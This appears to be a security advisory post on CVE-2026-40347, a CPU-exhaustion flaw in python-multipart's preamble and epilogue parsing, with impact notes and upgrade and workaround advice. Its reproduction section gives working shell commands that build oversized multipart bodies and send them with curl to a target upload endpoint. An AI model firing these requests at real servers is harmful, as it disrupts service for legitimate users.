Listen to this Post
How CVE-2026-40347 Works
The vulnerability exists in python-multipart, a streaming multipart parser for Python used in many web frameworks to handle `multipart/form-data` requests. Two inefficient parsing paths can be triggered by an attacker with control over the request body.
– Inefficient preamble parsing: Before the first multipart boundary, the parser inefficiently processes leading CR and LF bytes while searching for the start of the first part. The parser attempts to find the boundary by scanning byte-by-byte, but when faced with a large preamble containing no boundary, it continues processing all those bytes without making progress toward finding the first part.
– Inefficient epilogue parsing: After the closing boundary, the parser continues processing trailing epilogue data instead of discarding it immediately. The RFC specification states that epilogue data should be ignored, but the vulnerable parser does not discard it; instead, it keeps iterating through the entire epilogue.
Because the parser runs synchronously on the main thread or worker process, the time spent parsing scales linearly with the size of the crafted preamble or epilogue data. An attacker can send a single HTTP request with a megabyte-sized preamble or epilogue, causing the parser to spend CPU cycles processing every byte. Under concurrent attack traffic, this can degrade request-handling capacity, increase latency, and lead to service degradation for legitimate users.
DailyCVE Form
Platform: `python-multipart`
Version: `<0.0.26`
Vulnerability: `DoS (parsing)`
Severity: `MODERATE`
Date: `2026-04-15`
Prediction: `2026-04-10`
What Undercode Say:
To reproduce the issue, send a multipart request with a large preamble:
Generate 10MB of preamble data
dd if=/dev/zero bs=1M count=10 | base64 > preamble.txt
Create multipart request with large preamble
{
echo -n "$(cat preamble.txt)"
echo -n "--boundary\r\n"
echo -n 'Content-Disposition: form-data; name="field"\r\n\r\n'
echo -n "value\r\n"
echo -n "--boundary--\r\n"
} > request.bin
Send to vulnerable endpoint
curl -X POST http://target/upload -H "Content-Type: multipart/form-data; boundary=boundary" --data-binary @request.bin
Alternatively, use a large epilogue:
{
echo -n "--boundary\r\n"
echo -n 'Content-Disposition: form-data; name="field"\r\n\r\n'
echo -n "value\r\n"
echo -n "--boundary--\r\n"
dd if=/dev/zero bs=1M count=10 | base64
} > request_epilogue.bin
Exploit:
An attacker can craft a single HTTP request with a multipart body where the preamble or epilogue is arbitrarily large (e.g., 100 MB). The parser will iterate over every byte of that data, consuming CPU proportionally to the size of the injected data. Since web servers typically limit request size (e.g., 100 MB), the attacker can maximize the CPU impact within that limit. Under high concurrency, multiple such requests can exhaust CPU cores, causing request queuing, timeouts, and service disruption.
Protection from this CVE:
- Immediate upgrade: Upgrade `python-multipart` to version 0.0.26 or later. The fix implements two improvements: (1) when processing leading CR/LF data, the parser skips ahead to the next boundary candidate instead of scanning inefficiently; (2) epilogue data after the closing boundary is immediately discarded without further processing.
- Workaround (if upgrade not possible): Configure your web application to reject requests with excessively large `Content-Length` for multipart endpoints, or implement a timeout for request parsing to kill long-running parsing operations.
Impact:
- Availability degradation: An attacker can cause high CPU consumption during request parsing, reducing the server’s capacity to handle legitimate requests and increasing response latency.
- Service disruption: Under sustained attack, worker processes may become blocked, leading to request queuing, timeouts, and potential cascading failures in the application.
- Limited scope: The issue degrades availability but does not typically result in a complete denial of service for the entire application. No memory corruption, privilege escalation, or data leakage is involved.
- Attack vector: Remote exploitation over the network with low complexity, no authentication required, and no user interaction.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
